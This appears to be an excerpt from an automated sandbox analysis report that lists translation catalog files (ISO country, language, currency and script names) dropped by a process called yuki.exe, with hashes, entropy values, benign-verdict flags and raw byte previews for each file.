                                                                                                    Preview:....................%...........0.......1.......H.......Y.......n...........................................!...........................1.......D.......T.......l.......~...........................................................*...................)...!...I...)...k...+...............!...............G...#...#...k...+.......#...............,...........*...C...J...........'.......!.......,...........!.......A........................................................................................................................................................Afro-Asiatic languages.Altaic languages.Artificial languages.Athapascan languages.Australian languages.Austronesian languages.Baltic languages.Caucasian languages.Celtic languages.Central American Indian languages.Cushitic languages.Finno-Ugrian languages.Germanic languages.Indic languages.Indo-European languages.Iranian languages.North American Indian languages.Papuan languages.Romance languages.Semitic languages.Sino-Tibetan language
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2202 messages, Project-Id-Version: iso_3166-2 'A'ana'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):90768
                                                                                                    Entropy (8bit):5.032211538377605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:GCvRrba4/8NHz+lzuX+0X0hT+Dn0JWh6No+Ilwy8hCeRZIlI:GC5q0zI+0C6ZhOo+IlshbRZIlI
                                                                                                    MD5:C8C50EED5140810058D7E085175A19E9
                                                                                                    SHA1:EEA78612365231E7631B8C85326A2A07AEB5E500
                                                                                                    SHA-256:F2E63759A47259F0DC8007ED5233FDCA12C378EFBAFF3607B61B01CD89DC6727
                                                                                                    SHA-512:D696F51FEAB58558922F752A1595252738D7383447667D4D1B199B2DBCFB870728E64B59AA7AF097DE7D355D2E3B08C71CFAFFDC9EAD391929423617479E03EC
                                                                                                    Malicious:false
                                                                                                    Preview:.................D..{....................................................................................................................................%......./.......>.......O.......^.......c.......i.......w.......}..................................................................................................................................................".......,.......4.......<.......E.......L.......Q.......Z.......`.......h.......t.......z...........................................................................................................................%.......A.......P.......X.......i.......s.......y.......................................................................................................................... .......%.......,.......4.......;.......B.......J.......S.......\.......e.......l.......|.........................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 163 messages, Project-Id-Version: iso_15924 'Afaka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8524
                                                                                                    Entropy (8bit):4.928580422696669
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fkK9YJz2mZtITzbk4jXj+Sa5hW8nGkVe0y:fl9WIvY4zjZa5hW8nGkI
                                                                                                    MD5:DE469946511A52688FB4ACAC0D5C82B1
                                                                                                    SHA1:036A722F1184E62D684C6B624977869EACA9DF2F
                                                                                                    SHA-256:39E759DD3EDFF7BB59F0B30CA6D121FD5B9ADD568065845A3824E6D29DE265C9
                                                                                                    SHA-512:0DC0FCB9F38647E294CE20B7FE8136464838F841C70574A087E49F14060AD29A63FE535E0DEB59C56DE750F653A234833062C89A8AB4C81A8FCA3AEB8017FFBC
                                                                                                    Malicious:false
                                                                                                    Preview:................4.......L...................?...................................'.......0.......6.......@.......F.......N.......Z.......g.......p.......w......................................................................................................./.......6.......Q.......Y...&...b...................(...................................................).......>.......I.......P.......X.......^.......g.......p...............................................................................2.......I...4...x...................................................................................#...........-.......M.......T.......X.......^.......v.......................................................................................................................-.......L.......].......r...........(...............................-...................................!...#...'.......K..."...k...)...................................................................................(.......3.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afganio'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23042
                                                                                                    Entropy (8bit):5.019011868801421
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bReOXlbXDEe2m33zmwZbjh5wsWP4XWAIziUG2zZ1QH4ZPe:sxI0bl22zmotmsWP4XWAI9zZ1QH4ZG
                                                                                                    MD5:0A61767256D6CEAB64397E67ADBF08A5
                                                                                                    SHA1:973D1C4489036E9EFF4258485DD011D508FD2C7C
                                                                                                    SHA-256:76BD359C2F051148068D909D38CCD76E6EF1B7C5BFE2AE0D8E4A0359A55C024B
                                                                                                    SHA-512:238B09F2C8D407496E0E863EFC40D9A39C711EEC7FC7BDDBD96F544F2B47F6174C0F249F645D4D92C0C01ABACAFA90FE5F57331DE9F8A3EBED4E8FAB84D72D3F
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 966 messages, Project-Id-Version: iso_3166-2 'Federacia \304\210efurba Teritorio Abu\304\235o'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):46967
                                                                                                    Entropy (8bit):5.06492705189213
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:CjWkFNJVUXbDMnQmo+QZ1LdguRM+townjd3esKRWmGfMyBDhoI6EnnUEfsMWb:Cj90XbbPxguRM+b1B6jkZWb
                                                                                                    MD5:6904141C8B5CF08AE7AAEBBEE588E56D
                                                                                                    SHA1:F34D32B7BA7C40708AB6245884CC7F118E567ADA
                                                                                                    SHA-256:5E8A68DEFD789F63AE6BC7BBC8551D52B45D392E9DCD5ED1E5EFD4CD55ABE727
                                                                                                    SHA-512:36D86B5C05175C138D7D53B0C00D0B79F416E7DDDC46400B5951F67F660B446FA4F191BB7202C58F0733BDB74CDD56A9E4FB72A8E291E65DE93C0936B8E0361B
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|<.......P.......P.......P.......P.......P.......P.......P.......P.......Q.......Q.......Q......+Q......AQ......KQ......[Q......uQ.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......R.......R.......R......,R..!...JR......lR......wR.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......S.......S......%S......+S......5S......DS......PS......YS......qS......{S.......S.......S.......S.......S.......S.......S.......S..+....S.......T......'T......:T......TT......kT......tT.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......U.......U......!U......2U......>U......UU......cU......jU......rU......~U.......U.......U.......U.......U.......U.......U.......U.......U.......U.......U.......U.......U.......V.......V.......V......'V......1V......@V......HV......PV......bV......tV.......V.......V.......V.......V.......V.......V.......V.......V.......V......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Brita Antarkta Teritorio'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2599
                                                                                                    Entropy (8bit):5.16904267116649
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD2frKTx1vGqIfdvqNuoU6GTjchIvZHrdguaYz0OjTqF0/:qD203yBoxGjr1dNa60sGF2
                                                                                                    MD5:D3E3283F3230E2F0C1FC4AE57581D9E9
                                                                                                    SHA1:ADF184A81B08FBF72875D29F3405B538E6FE90B6
                                                                                                    SHA-256:98E1548F288FB0789C304E0BB79FF5A87AE02EB5E1A9F71817E00499A91C264A
                                                                                                    SHA-512:386C057247D234363625569EB07A2AFB76CA62F9369ABE291C8E385F7C2EC9E2F6064F197ECCAE18A14A3D736868885E646BE3067AE4CD4F00ED5C60F61BA463
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........|...........&...$...?...%...d...........3...............................................&...4.......[.......y...........................................&...................".......8.......?...!...L...2...n........... .............../....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 152 messages, Project-Id-Version: iso_4217 'Kontunuo de la Azia Disvolva Banko'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8374
                                                                                                    Entropy (8bit):4.885039527310701
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vONzbkH5NQ3fno2TEjwLTjLhPm9DsUEy/sG4svtGX:vO9oY/o2TE2XLq1Zo
                                                                                                    MD5:A76996D28B4DDE95CECD34A36440B83D
                                                                                                    SHA1:A8E11E4A5904B1029972CEF10D1B4C937CDB9EC1
                                                                                                    SHA-256:7A9296B5C02B3124EB684E3B41B43D8E2F2F213BF10FA3E1D711B71259DBFD0E
                                                                                                    SHA-512:49E0A3320B23BFB9D6ED076FF279568C76B002FB8E6D6239CD1E5EB1D63105D53FD35D23D82D4CC8A51B869161A1E5D5C2AE2F9D4F918658E782E86DB34FB765
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................#.......1.......?.......Q.......a.......p.......u.......|...................................1.......3.......9...,...7...f...............................................................................".......8...0...E.......v.......................................................................................................(.......7.......I.......X.......].......t.......................................................................................................................!.......1.......A.......F.......K.......Y.......^.......c.......r.......v.......|.......................................................................................................<.......O.......a.......t.......................................................................................................................%.......*.......7.......?.......F.......T.......a.......}.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 938 messages, Project-Id-Version: iso_639-3 'Ab\304\245aza'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48656
                                                                                                    Entropy (8bit):5.071967224773761
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bLGVFKgYyyP5x6T6ftkFjcdWDo/uLSUWgm1bQxQfYCeNyrSU9r7amtMgyDDHh6eB:YFRax6O1kFjiuLhWgmKxQQxUSwr7fj6v
                                                                                                    MD5:256A7638CEA3A79EE07FC04AC3CAEC1C
                                                                                                    SHA1:6E1F3656C993E583DAB63C526B49F8AB16128BF3
                                                                                                    SHA-256:F30D7DEDB28EE7E6E2A48DB89A80B9B7A6B5487702EFE42F02541C4D38BD724C
                                                                                                    SHA-512:BED1341C86D326FEA7E98AB1238DCA9F98AF538BF6D2F8D7726A4ACD4FF818CFCBE0DCCD92DEB4392A368F26E358AF94FB92B9E099B30F009344C0FE2DB805C8
                                                                                                    Malicious:false
                                                                                                    Preview:................l........:......hN......iN......sN......|N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......O.......O......&O......>O......UO......jO......zO.......O.......O.......O.......O.......O.......O.......O.......O.......P......'P......<P......CP.."...PP......sP.......P.......P.......P.......P.......P.......P.......P.......P.......Q.......Q......2Q......CQ......PQ......_Q......sQ.......Q.......Q.......Q.......Q.......Q.......Q.......R......#R......1R......AR......YR......jR......{R.......R.......R.......R..,....R.......R.......R.......S......:S......MS......US......\S......qS.......S.......S.......S.......S.......S.......S.......S..#....S.......T......0T......7T......?T......FT......MT......YT......lT.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......U.......U......)U......1U......8U......=U......HU......]U......eU......|U.......U.......U.......U.......U.......U.......U.......U.......U......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 101 messages, Project-Id-Version: iso_639-5 'Afrik-Aziaj lingvoj'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6705
                                                                                                    Entropy (8bit):4.905204510081911
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:SBfZ17SHyZi4qSoZySE0BfCuXrUUZJFVCYejMnubdKP5JuTmhM:SxDKgSE0Bf/ZcZUuqmIM
                                                                                                    MD5:2BCCC065FF3A05499C5C1588039D026D
                                                                                                    SHA1:5AB723C467DCAFAE2E2EE89EF0327467A40DE92B
                                                                                                    SHA-256:E96952C8D2EF79D58806FD389275D83C4C2A147E5E4F20B886359FC069E4C334
                                                                                                    SHA-512:CD26A317715E693B3C8A78DAE8BCF8E01B6C3D9F87772FAF96A66259D740E78CE9B29A25EEBCACEF641F470A0E763928621DD3C553AFAC27F5EAE85239C48F80
                                                                                                    Malicious:false
                                                                                                    Preview:........e.......D.......l.......................................................................................G.......\.......u...............................................................................&...!...7...#...Y.......}...................................$.......#.......%...'.......M.......`.......t...........#...........................................!.......4.......G.......W.......e.......u...............................................................................2.......N......._.......o...............................................................&.......?.......P.......b.......s...............................................................................-.......?.......Q.......q.......................................................................%.......8.......P...#...f...............................................................................................................4.......H.......Z.......p.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10493
                                                                                                    Entropy (8bit):5.078280771514611
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:duTp/IfltU4WjV9qWxa5hW8nKg23TShM6Aa79Mc:qYg4WjVDxa5hW8nKl3uhIuMc
                                                                                                    MD5:040FE69896A353D282E2ED68E3E94CF7
                                                                                                    SHA1:1FC1F48EA5766881416D3D3A486AE091260F519D
                                                                                                    SHA-256:81D9292626A2412282630F67A261E09B8AD276F83AE6758C79A696796E5077E9
                                                                                                    SHA-512:0DF3A7969F337AE1638EC4D91A1FDE8782F703DE7C0BFD4203A34F2AE14418CBB0BC72C2ED237A85F643C365CCE29AE775124AB087A9E5A93834ACFC90CF34A2
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24037
                                                                                                    Entropy (8bit):5.033412581608283
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosmldaIJq46nbjz5wsWP48WAINiZGk0V1xwwAC0I:0oBagq48fmsWP48WAIW0V1xpACD
                                                                                                    MD5:1713B9FE5A259E1E4A89DA36628E443B
                                                                                                    SHA1:9317C05281A46F4E51B860F043CDE40AF296233C
                                                                                                    SHA-256:8771F37760F208C02D3A412EF1F8E200ACB05F83103E5727EC94E5D48AEF9324
                                                                                                    SHA-512:E06AAAA5941D864D4846AD383D213B71F4634183812B6584733FE3472DA1BCABCE65D4A6FB5E09F919E60E3C3BD3718D2DADD916B92FAF0657AB5D2D1C0CE221
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 354 messages, Project-Id-Version: iso_3166-2 'Abruzos'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15680
                                                                                                    Entropy (8bit):4.857214726296532
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2h2YJ2FemhAWvsHmCS4Rm5+wtuqDdspO9hLPtpIWAGi2TQD0an:2mHe+3LxspO9ZDvbi2TQYi
                                                                                                    MD5:E7E4F8929F609C302089C9323AF125C2
                                                                                                    SHA1:9FFA18435A4B4D3E1E6F9A0F9BBD883FECD603F3
                                                                                                    SHA-256:D870A78E39175D4BC6AC86403B02E96FC6809A3211ED08BCFA9CEBBF984C4E71
                                                                                                    SHA-512:6DCDFACBDBF2C0CCAEBA166A5508652FBDC7F28CF6246A3B97553D16A07FC53CC2F33741196A8F098D10B94E7D55617BA71C1F5470204916829874BFD6336E16
                                                                                                    Malicious:false
                                                                                                    Preview:........b.......,.......<...............................................................................................".......*.......3.......B.......I.......Z.......d.......p.......v.......}.......................................................................................................................................&...............4.......C.......K.......T.......\.......e.......v.......}........................................................................................................ ....... ....... ....... ......% ......, ......G ......d ......p ......v ......| ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!......'!.......!......6!......?!......K!......R!......_!......h!......q!......y!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......'"....../"......9"......A"......I"......X"......_"......r"......."......."......."......."......."......."......."......."......."......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Territorio Ant\303\241rtico Brit\303\241nico'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2927
                                                                                                    Entropy (8bit):5.2001401796469215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3gsAvY0lsL7+vGqIfdvqN5CoUWJLYfsuQEIectlsQD6sQ0W:rLvgpY0yf+yaCo9MfsRxe+xO0W
                                                                                                    MD5:0E92A8163DBB78317FB5B8986CDB178D
                                                                                                    SHA1:CADA09837DA67DD9D10E215CA076DB9FF11392EC
                                                                                                    SHA-256:3135BE2DF3C65D729ACE9FFDD78D013D106F93C1218F5A85F737CF8D477E23C2
                                                                                                    SHA-512:1852FB796607E8E47B250069A08603AC22FF0B73CBFE024C5980BE0A3A4C6BD53F262B53055162C260D4AC7027C8ED4D4E7CBE8ECCE31E4961CBEFF7A8DFE5EA
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+....................... ......./.......0... .......Q...2...l...................................0.......+.......$...G.......l.........................................../...................!.......5.......<.......L...3...{...........#...............*.......4...$.......Y........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Unidad de cuenta del ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9745
                                                                                                    Entropy (8bit):4.967595778791643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFPxFPuc0O+Mz2E6VRyK0G/2LCntx5KYHlLTP:Sx0O+UN6TL0G/Uo/kYHFP
                                                                                                    MD5:183C5AB807F05893ABCD81095EC5AECE
                                                                                                    SHA1:C7FCA2B2C0ECC62FCA58B73D329BD11BA0B2A2CE
                                                                                                    SHA-256:CD787D3B8DC053F82F9C9F73A7A97E0FF17944A926143305A9339F3A56DF366E
                                                                                                    SHA-512:6858055932275551D62E3EA53B7FBA5359CEBB3901DEAB81D1A10837E44FE0856DD57D5C1C1F4FD254081A9A184E2411620188872DBB423F31406A14680901EA
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 796 messages, Project-Id-Version: iso_639-3 'Are are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33190
                                                                                                    Entropy (8bit):4.837226010109302
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:cY0odpW4MTtW2nJ9/M5x2b4lf1xhmlhLnWJ:cgVQJ/4FfhuhI
                                                                                                    MD5:DE16EB7D5DB666367B8E1E8D32948A04
                                                                                                    SHA1:BA63F9E40512B468B7B1D2CDB695ED756DA4FF39
                                                                                                    SHA-256:477D9BF18035C678B7A80C186F4C949A01242D21F733BB2BD6A9A7E7B19CF735
                                                                                                    SHA-512:33FCC7F47E646D38EF5A809DDB42CC14E9D606894839759C9CAEF8306BC41C9A1C88EC3FCFC702B34F7549AC33777CEE66996E919180F47BCE29C191A5E8D1AD
                                                                                                    Malicious:false
                                                                                                    Preview:....................%....1......pB......qB......zB.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......C.......C.......C.......C.......C.......C...... C......(C....../C......7C......<C......EC......QC......`C......iC......xC......~C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......D.......D.......D.......D......(D....../D......8D......BD......JD......RD......XD......fD......lD......qD......wD......{D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......E.......E.......E.......E...... E......'E......4E......AE......GE......OE......UE......cE......rE.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......F.......F.......F.......F...... F......'F......,F......4F......:F......?F......FF......KF......\F......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9689
                                                                                                    Entropy (8bit):4.95092942214389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dJaYCbW7AZltU4WjV9qWxa5hW8pKtoG0+QJf4TI:vCbW7AZg4WjVDxa5hW8Mtd2JQTI
                                                                                                    MD5:8DD768B26F2B3743BB151E3CB2EF4377
                                                                                                    SHA1:8941C26EF281C91F497939ABAFEF4B6264B5D8FB
                                                                                                    SHA-256:6C16BE94FF8A5BC924F76688EA2CAD76646CA3B7245CB9F641133AF03E13D2BC
                                                                                                    SHA-512:A265492A932AC52A282EC831ADAE2252373998AF74A414450FC2147204458B624463640C22D8BE85118E64036A49B7689A3578DFC6355B23070633703AFACB5F
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23059
                                                                                                    Entropy (8bit):4.985940554477765
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosmG+RXXsPB46nbjz5wsWP48WAINiZGlsV33FkuIHMBydf64goZCdYHLJ:0oXGqXsPB48fmsWP48WAIxjKLc
                                                                                                    MD5:7F8E0A125BB95C51D288405390181ECD
                                                                                                    SHA1:ABB61787E3E4B7FAA6CE932F62CFD4144749E9A6
                                                                                                    SHA-256:264772840538D1ACEBA3DF3ABDE1CBC855B55A7371FDD2957D721B4C79ABA750
                                                                                                    SHA-512:8563F7640AA478AD75FE3C6422992ECCB594F6413A17A4FF862D8B1664E99747FE7952453EF2BB3190204DBFAB004C2AD9467254ED34BEF21152EB7D614FB5A5
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 284 messages, Project-Id-Version: iso_3166-2 'Ab\305\237eron'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12218
                                                                                                    Entropy (8bit):4.961380213961465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:3Bk39AJgt6TXGI3UEnJMHkdu334Tl64chKDKZb2cpJwDHmu4AKqyy:wAuk6I3UEnJM9y2gZcUDPZKry
                                                                                                    MD5:2E1A94A2EE6BF1AE41799D2F7603273E
                                                                                                    SHA1:6B8EF9F1C5BF83204C753BF4C0E403DFDA6F75E3
                                                                                                    SHA-256:D6FDDCAF77B55C4F6688A4A7B40381FF2E360C1ABBFFCFBB25D3A94A7450675D
                                                                                                    SHA-512:47649D6B137D57DAD5C6E2F6CF59C5FDCA04E5AD0E2FB21C2A577326D61B0E6411CB3D4A7C4B9E8D3DEA0BE31C912F14CFF322B2DF8F142F78E05F3FCB92E703
                                                                                                    Malicious:false
                                                                                                    Preview:....................{...................................................................................%.......+.......9.......@.......].......h.......o.......w...............................................................................................................................................................................'.......4.......?.......I.......R.......Z.......b.......j.......t.......z................... ...................................................................................!.......,.......8.......A.......H.......Q.......Z.......a.......i.......t.......|...............................................................................................................!.......).......7.......?.......E.......R.......[.......e.......p.......u...............................................................................................................................................!.......(.......0.......8.......?.......G.......N.......Z.......c.......n.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Briti Antarktise ala'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2748
                                                                                                    Entropy (8bit):5.20915588707542
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf360Rit+vGqIfdvqN5CoUSPSxBQMLukCyCnEP7DZpZ66Hn:rLv6aI+yaCoRSxB/LCyCu7DZL66Hn
                                                                                                    MD5:3079661C68E2866F67FDC2DAE690489E
                                                                                                    SHA1:6D8DCC6C8F6C849FF6527A17CEF8EA867604F8BC
                                                                                                    SHA-256:7D6A05FEE0868AF7547D6A4B75C7CC6F13883333EBE0B837298B456E9D8C8DE3
                                                                                                    SHA-512:1D60CF21B6BE1F323F76A53EB49121FB3BE15A2AE23879A9DE98024237052BEE150892440E24AF26912C5E01D8812D03A4236029C027C96F42722920281E68C5
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................".......................9...........T.......\.......q.......{...........%...........................................................?...&...M.......t...........................).......@...................4.......S..."...a...(....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB arveldus\303\274hik'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9565
                                                                                                    Entropy (8bit):4.9459869854070195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFRwaG/LwdL6VRyK0G/2LCntx8q7IUY++39VJXm:S3wBLwdL6TL0G/Uo/8qMl+4m
                                                                                                    MD5:4DCA45537A1D21114C31C1B967F8F8AC
                                                                                                    SHA1:2546E15C1B1DB7B757A09A296910F0D163D55B1C
                                                                                                    SHA-256:24C53B9FAB946BD7D0DD42D70AEA09E0478E9549BCB54FEF8D2E2D2BB0E48952
                                                                                                    SHA-512:90E6A3107D3B97341B6EFD3BD4671C5B1397E71F2ADD8CB027DC5136EE8F0F8C15A0831A7F79F8F36B8218A342EEAE837A6AFFC3ADAE3043EBAFF18A321BFB41
                                                                                                    Malicious:false
